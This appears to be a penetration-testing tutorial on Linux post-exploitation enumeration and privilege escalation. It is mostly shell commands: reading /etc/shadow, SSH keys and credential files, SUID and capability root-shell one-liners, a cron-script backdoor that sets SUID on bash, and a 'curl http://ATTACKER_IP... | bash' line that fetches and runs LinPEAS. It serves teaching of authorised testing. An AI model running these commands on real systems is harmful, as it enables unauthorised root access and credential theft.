Ethical Hacking #linux#post-exploitation#privilege-escalation

Linux Post-Exploitation Enumeration Guide

Master Linux post-exploitation enumeration with manual commands, SUID binary discovery, cron job abuse, LinPEAS automation, and privilege escalation paths.

7 min read

You’ve landed a shell on a Linux box. Now what? Post-exploitation enumeration is the systematic process of understanding where you are, who you are, what you have access to, and how you can escalate privileges. This guide covers both manual techniques and automated tools to help you build a complete picture of the compromised host.

First 60 Seconds: Situational Awareness

Run these immediately after gaining access:

# Who am I and what groups do I belong to?
id
whoami
groups

# What OS and kernel version?
uname -a
cat /etc/os-release
cat /proc/version

# What's the hostname and IP info?
hostname
ip addr show
ifconfig 2>/dev/null

# Any other users on the system?
cat /etc/passwd
cat /etc/shadow  # Only readable as root — check if accessible

# What's the current directory and home?
pwd
ls -la ~

The id command is often the most immediately revealing. Membership in groups like sudo, docker, lxd, disk, or adm can provide straightforward escalation paths without any exploit needed.

User and Credential Enumeration

# All users with login shells
grep -v nologin /etc/passwd | grep -v false

# Users who have logged in recently
last
lastlog

# Currently logged-in users
who
w

# Sudo privileges for current user (may prompt for password)
sudo -l

# Read SSH keys
ls -la ~/.ssh/
cat ~/.ssh/id_rsa 2>/dev/null
cat ~/.ssh/authorized_keys 2>/dev/null

# Check for credential files
find / -name "*.conf" -readable 2>/dev/null | xargs grep -l "password" 2>/dev/null
find / -name "*.env" -readable 2>/dev/null
find / -name "wp-config.php" -readable 2>/dev/null
find / -name "config.php" -readable 2>/dev/null

SUID Binaries

SUID (Set User ID) binaries run with the permissions of their owner, not the caller. SUID binaries owned by root that can be abused are one of the most reliable privilege escalation paths.

find / -perm -4000 2>/dev/null

A cleaner output with file type:

find / -perm -4000 -type f -exec ls -la {} \; 2>/dev/null

Compare your output against GTFOBins — a curated list of Unix binaries that can be exploited when they have special permissions. Common finds and their abuse:

BinaryExploit Method
/usr/bin/findfind . -exec /bin/bash -p \; -quit
/usr/bin/vim:!/bin/bash or :set shell=/bin/bash:shell
/usr/bin/python3python3 -c 'import os; os.execl("/bin/bash", "bash", "-p")'
/usr/bin/nmapnmap --interactive then !sh (older versions)
/usr/bin/cpCopy /etc/passwd with modified root entry
/usr/bin/lessless /etc/passwd then !bash

SGID binaries (run as the owning group) are also worth checking:

find / -perm -2000 -type f 2>/dev/null

Capabilities

Linux capabilities are a more granular privilege system. Some capabilities can be as dangerous as SUID:

getcap -r / 2>/dev/null

Watch for:

  • cap_setuid — Can set UID (essentially root)
  • cap_net_raw — Can use raw sockets (useful for sniffing)
  • cap_dac_override — Can bypass file permission checks

Example: Python with cap_setuid:

/usr/bin/python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'

Cron Jobs

Cron jobs running as root that reference writable scripts or directories are a classic escalation vector:

# System-wide cron
cat /etc/crontab
cat /etc/cron.d/*
ls -la /etc/cron.daily/ /etc/cron.hourly/ /etc/cron.weekly/

# User-specific crons (check other users if you have access)
crontab -l
cat /var/spool/cron/crontabs/* 2>/dev/null

If a cron job runs /opt/scripts/backup.sh as root and /opt/scripts/backup.sh is world-writable:

echo 'chmod +s /bin/bash' >> /opt/scripts/backup.sh
# Wait for cron to execute...
/bin/bash -p

Writable Files and Directories

# World-writable files (excluding /proc and /sys)
find / -writable -type f 2>/dev/null | grep -v proc | grep -v sys

# World-writable directories
find / -writable -type d 2>/dev/null | grep -v proc | grep -v sys

# Files owned by current user
find / -user $(whoami) -type f 2>/dev/null | grep -v proc

Processes and Services

# Running processes (all users)
ps aux

# Processes running as root
ps aux | grep root

# Open network connections and listening ports
ss -tulpn
netstat -tulpn 2>/dev/null

# Services (systemd)
systemctl list-units --type=service --state=running

# Interesting environment variables
env
printenv

Internal services listening on 127.0.0.1 but not externally accessible are interesting — they may be exploitable once you have local shell access. Use SSH port forwarding to reach them from your attack machine.

Installed Software and Version Info

# Debian/Ubuntu
dpkg -l | grep -i "interesting_package"

# RPM-based
rpm -qa

# Check for known-vulnerable versions
mysql --version 2>/dev/null
apache2 -v 2>/dev/null
nginx -v 2>/dev/null
python3 --version
sudo --version

Cross-reference versions with searchsploit:

searchsploit sudo 1.8

Network Enumeration

# ARP table (other hosts on the network)
arp -a
cat /proc/net/arp

# Routing table
ip route
route -n

# DNS configuration
cat /etc/resolv.conf

# Hosts file (may reveal internal hostnames)
cat /etc/hosts

Automating with LinPEAS

LinPEAS (Linux Privilege Escalation Awesome Script) automates most of the above and highlights findings in color by severity.

Transfer and Run

From your attack machine, serve it:

python3 -m http.server 8080

On the target:

curl http://ATTACKER_IP:8080/linpeas.sh | bash
# or download first
wget http://ATTACKER_IP:8080/linpeas.sh -O /tmp/lp.sh
chmod +x /tmp/lp.sh
/tmp/lp.sh 2>/dev/null | tee /tmp/lp_output.txt

Download LinPEAS from the PEASS-ng GitHub repository. The color-coded output uses:

  • Red/yellow — 95% privilege escalation probability
  • Red — High probability
  • Yellow — Worth investigating
  • Green/blue — Informational

Other Automation Tools

  • linux-smart-enumeration (LSE): lse.sh -l 1 for a clean, categorized output
  • LinEnum: An older but reliable shell script alternative

Interesting Files to Check

# Bash history (often contains credentials or useful commands)
cat ~/.bash_history
cat /home/*/.bash_history 2>/dev/null

# Mail spool
ls /var/mail/
cat /var/mail/root 2>/dev/null

# Log files (for credentials or clues)
cat /var/log/auth.log 2>/dev/null | grep -i "password\|fail\|success"
cat /var/log/apache2/access.log 2>/dev/null | head -50

# Database files
find / -name "*.db" -o -name "*.sqlite" -o -name "*.sqlite3" 2>/dev/null

A Systematic Approach

Don’t enumerate randomly. Follow this priority order:

  1. sudo -l — Instant escalation if misconfigured
  2. SUID binaries — Reliable and common
  3. Cron jobs — Look for writable scripts
  4. Capabilities — Often overlooked
  5. Writable sensitive files/etc/passwd, service configs
  6. Kernel exploits — Last resort due to system instability risk

Post-exploitation enumeration is where the real work of a pentest happens. The initial foothold matters little if you can’t pivot or escalate. Take notes, save command output, and cross-reference everything against GTFOBins and exploit databases to maximize your findings.

#linpeas #privilege-escalation #post-exploitation #linux

// related articles

ethical-hacking Linux Privilege Escalation Techniques and Tools 7 min read ethical-hacking LinPEAS: Linux Privilege Escalation Automation Guide 8 min read ethical-hacking Linux Privilege Escalation Techniques 10 min read